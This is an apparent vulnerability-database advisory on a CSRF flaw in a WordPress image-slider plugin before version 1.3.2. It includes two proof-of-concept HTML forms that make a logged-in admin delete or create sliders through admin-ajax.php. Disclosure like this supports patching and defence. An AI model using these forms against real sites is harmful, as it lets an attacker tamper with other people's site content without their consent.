WordPress Plugin Vulnerabilities
Responsive Image Slider, Photo Gallery And Carousel < 1.3.2 - Slider Clone/Save/Delete via CSRF
Description
The plugin has a logic flaw in its CSRF checks in the sf_clone_slider, sf_save_slider and sf_remove_slider AJAX actions, which could allow an attacker to make a logged in user call them via a CSRF attack.
Proof of Concept
To delete a slider: <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="sf_remove_slider" /> <input type="hidden" name="do_action" value="single" /> <input type="hidden" name="sf_slider_id" value="2" /> <input type="submit" value="Submit request" /> </form> </body> </html> To create a slider <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="sf_save_slider" /> <input type="hidden" name="sf_slider_id" value="1" /> <input type="hidden" name="sf_slider_layout" value="1" /> <input type="hidden" name="sf_slider_title" value="CSRF" /> <input type="hidden" name="sf_slide_ids" value="" /> <input type="hidden" name="sf_slide_titles" value="" /> <input type="hidden" name="sf_slide_descs" value="" /> <input type="hidden" name="sf_1_width" value="100%" /> <input type="hidden" name="sf_1_height" value="100%" /> <input type="hidden" name="sf_1_auto_play" value="true" /> <input type="hidden" name="sf_1_sorting" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2021-10-18 (about 2 years ago)